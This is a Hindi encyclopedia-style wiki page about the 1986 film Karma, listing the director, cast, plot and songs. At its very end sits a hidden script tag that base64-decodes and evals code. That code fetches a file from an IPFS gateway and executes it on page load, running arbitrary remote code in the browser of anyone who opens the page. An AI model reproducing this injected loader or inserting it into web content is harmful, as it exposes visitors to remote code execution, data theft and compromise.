कर्मा (1986 फ़िल्म)

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 13:56, 17 सितम्बर 2013 का अवतरण
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
कर्मा (1986 फ़िल्म)
फ़िल्म 'कर्मा' का पोस्टर
निर्देशक सुभाई घई
निर्माता सुभाई घई
कहानी सचिन भोव्मिक, सुभाष घई, कादर ख़ान
कलाकार दिलीप कुमार, नूतन, अनिल कपूर, जैकी श्रॉफ, नसीरुद्दीन शाह, श्रीदेवी, पूनम ढिल्लो और अनुपम खैर
संगीत लक्ष्मीकांत-प्यारेलाल
गीतकार आनन्द बख्शी
गायक मोहम्मद अजीज, कविता कृष्णमूर्ति, किशोर कुमार, अनुराधा पौडवाल, सुरेश वाडेकर, मनहर उदास।
प्रदर्शन तिथि 8 अगस्त, 1986
अवधि 194 मिनट
भाषा हिन्दी
देश भारत
अन्य जानकारी इस फ़िल्म में अनुपम खैर द्वारा निभाई गई 'डॉ. डैंग' की भूमिका ने हिन्दी सिनेमा में एक अमिट छाप छोड़ी। डॉ. डैंग का किरदार आज भी दर्शकों को रोमांचित करता है।

कर्मा निर्माता-निर्देशक सुभाई घई की सुपरहिट फ़िल्मों में गिनी जाती है। इस फ़िल्म में दिलीप कुमार, नूतन, अनिल कपूर, जैकी श्रॉफ, नसीरुद्दीन शाह, श्रीदेवी, पूनम ढिल्लो और अनुपम खैर आदि ने मुख्य भूमिकाएँ निभाई थीं। इस फ़िल्म में अनुपम खैर द्वारा निभाई गई 'डॉ. डैंग' की भूमिका ने हिन्दी सिनेमा में एक अमिट छाप छोड़ी। डॉ. डैंग का किरदार आज भी दर्शकों को रोमांचित करता है। फ़िल्म में संगीत लक्ष्मीकांत-प्यारेलाल ने दिया था।

कहानी

फ़िल्म 'कर्मा' की कहानी में जेलर विश्वप्रताप सिंह (दिलीप कुमार) आंतकवादी डॉक्टर माइकल डैंग (अनुपम खैर) को पकड़ता है, जिसके बदले में डैंग विश्वप्रताप के दोनों बेटे और बहु की हत्या कर देता है और जेल से फरार हो जाता है। विश्वप्रताप की पत्नी (नूतन) ये सदमा बर्दाश्त नहीं कर पाती और अपनी आवाज़ खो देती है। जेलर विश्वप्रताप खुद को दादा ठाकुर बताकर डैंग से अपने परिवार की मौत का बदला लेने का फैसला करता है। इसके लिए वह जेल से तीन अपराधियों (अनिल कपूर, जैकी श्रॉफ, नसीरुद्दीन शाह) को भगाता है और उनकी मदद लेता है। तीनो अपराधी जेल से रिहा होने के लिए दादा ठाकुर की बात मान लेते हैं। अंत में अनेक उतार-चढ़ावों से होती हुई फ़िल्म का सुखद अंत होता है।

कलाकार

  • दिलीप कुमार - राणा विश्वप्रताप (दादा ठाकुर)
  • नूतन - रुक्मणी
  • नसीरुद्दीन शाह - खैरुद्दीन चिश्ती
  • जैकी श्रॉफ - बज्जू ठाकुर
  • अनिल कपूर - जॉनी/ज्ञानेश्वर
  • अनुपम खैर - डॉ. माइकल डेंग
  • श्रीदेवी - राधा
  • पूनम ढिल्लो - तुलसी
  • दारा सिंह - धरमा
  • टॉम अल्टर - रेक्सन
  • शक्ति कपूर - जग्गा
  • जुगल हंसराज - राणा विश्वप्रताप का पुत्र
  • मुकरी - छोटे ख़ान
  • बिन्दू - राधा की आंटी

गीत

  1. मेरा कर्मा तू - मोहम्मद अजीज, सुरेश वाडेकर, मनहर उदास
  2. ऐ वतन तेरे लिए - मोहम्मद अजीज, कविता कृष्णमूर्ति
  3. ऐ सनम तेरे लिए - दिलीप कुमार, मोहम्मद अजीज, कविता कृष्णमूर्ति
  4. मैंने रब से तुझे माँग लिया - मनहर उदास, अनुराधा पौडवाल
  5. दे दारू - किशोर कुमार, महेन्द्र कपूर, मनहर उदास
  6. ना जइयो परदेश - किशोर कुमार, कविता कृष्णमूर्ति
  7. ऐ मोहब्बत तेरी दास्तां के लिए - अनुराधा पौडवाल


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>